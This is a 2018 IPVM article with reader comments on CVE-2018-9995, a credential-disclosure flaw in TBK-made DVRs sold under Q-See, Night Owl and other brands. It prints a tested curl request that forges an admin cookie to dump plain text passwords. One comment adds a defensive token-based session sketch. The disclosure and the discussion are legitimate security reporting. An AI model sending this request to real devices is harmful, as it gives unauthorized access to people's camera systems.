Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs

John Scanlan
May 02, 2018
IPVM • IPVMU Certified

A vulnerability that exposes plain text credentials on affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. The vulnerability is outlined in CVE-2018-9995.

The affected DVRs are manufactured by TBK and are also OEM'd by:

  • CeNova
  • DVR Login
  • HVR Login
  • MDVR Login
  • Night OWL
  • Novo
  • Pulnix
  • QSee
  • Securus
  • XVR 5 in 1

The exploit, tested by IPVM, is a simple curl command:

curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).



The plain text credentials returned from this command granted admin access to the device.

Undisclosed #1
May 02, 2018
IPVMU Certified

opt=user&cmd=list

Obviously they really tried hard to hide this backdoor ;)

Undisclosed #2
May 03, 2018

The key here is probably the cookie...

-H "Cookie: uid=admin"

Like the recent Hikvision cloud exploit, it looks like these cameras are taking the "logged in" user value from the cookie. "You're the admin you say? Come on in!"

If you're going to use cookies, it's trivial to use a simple token. Generate a token on login, let the user store that token in a cookie, and if the user supplies an expired or unrecognized token, force login again. Anything is better than letting the user decide what level of privilege they should have.
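
The token scheme described in the comment above, sketched in Python next to the flawed cookie check. This is an added example, not code from the thread, IPVM, or any DVR vendor. The names `login`, `authorize`, `SESSIONS`, the `session` cookie name and the 15-minute lifetime are assumptions, and the account is constructed sample data.

```python
import hashlib, hmac, secrets, time

SESSION_TTL = 900   # seconds a token stays valid (assumed value)
SESSIONS = {}       # token -> (username, role, expiry); kept on the server only

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

# Constructed sample account store (illustration only)
_SALT = secrets.token_bytes(16)
USERS = {"admin": {"salt": _SALT, "role": "admin",
                   "hash": hash_pw("constructed-sample-pw", _SALT)}}

def insecure_is_admin(cookies):
    """Flawed pattern from the thread: the client names its own identity."""
    return cookies.get("uid") == "admin"

def login(username, password, now=None):
    """Return a fresh random token on valid credentials, else None."""
    now = time.time() if now is None else now
    user = USERS.get(username)
    if user is None:
        return None
    if not hmac.compare_digest(user["hash"], hash_pw(password, user["salt"])):
        return None
    token = secrets.token_urlsafe(32)          # unguessable, carries no meaning
    SESSIONS[token] = (username, user["role"], now + SESSION_TTL)
    return token

def authorize(cookies, now=None):
    """Return (username, role) for a live token; None means force login again."""
    now = time.time() if now is None else now
    token = cookies.get("session", "")
    entry = SESSIONS.get(token)
    if entry is None:                          # unrecognized token
        return None
    username, role, expiry = entry
    if now >= expiry:                          # expired token: drop it
        del SESSIONS[token]
        return None
    return username, role                      # role comes from server state
```

The role returned by `authorize` is looked up from server-side state, so nothing the client writes into a cookie can raise its own privilege.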

Paul Shah
May 02, 2018

Do they have a business presence in the US?

John Scanlan
May 02, 2018
IPVM • IPVMU Certified

TBK is a Spanish company, however OEMs like Q-See and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Costco, and more.

Paul Shah
May 02, 2018

John, 

Q-See is OEMing TVT and Dahua, at least for the past few years. 

Night Owl is Hikvision and Raysharp for the past few years as well.

I would be interested to see the models from TBK for these brands.

John Scanlan
May 02, 2018
IPVM • IPVMU Certified

There are ~1.5k vulnerable units online in the US, out of ~55k total vulnerable units online worldwide.

The VR4104 and DVR4216 series from TBK are vulnerable.  I am not sure what those model numbers are at the OEMs, but will look into it and report back here with anything I find.

Vulnerable Q-See Login:

DVR_login_4

Vulnerable Night Owl Login:

DVR_login_5

 

Jon Dillabaugh
May 03, 2018
Pro Focus LLC

Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.

Edward Greenspan
May 10, 2018

Does anyone have the MAC prefix for their devices?

 

John Scanlan
May 10, 2018
IPVM • IPVMU Certified

Sean - Here is a list of the affected brands and the associated OUIs:

Brands

TBK
CeNova
DVR Login
HVR Login
MDVR Login
Night OWL
Novo
Pulnix
QSee
Securus
XVR 5 in 1


Edward Greenspan
May 10, 2018

Amazing!  Thanks!

Sean Nelson
May 10, 2018
Nelly's Security

Manufactured by TBK, a Spanish company? Are they really manufactured in a Spanish country?

Shay Fogel
May 11, 2018

Those DVRs were designed and manufactured by Streamax, China.

Vincent Tong
May 11, 2018

TBK looks like TVT to me. QSEE often uses TVT

Abaas Mahroos
Mar 05, 2019
Al Aswar Trading Group • IPVMU Certified

This is correct. TBK is actually just a TVT OEM.
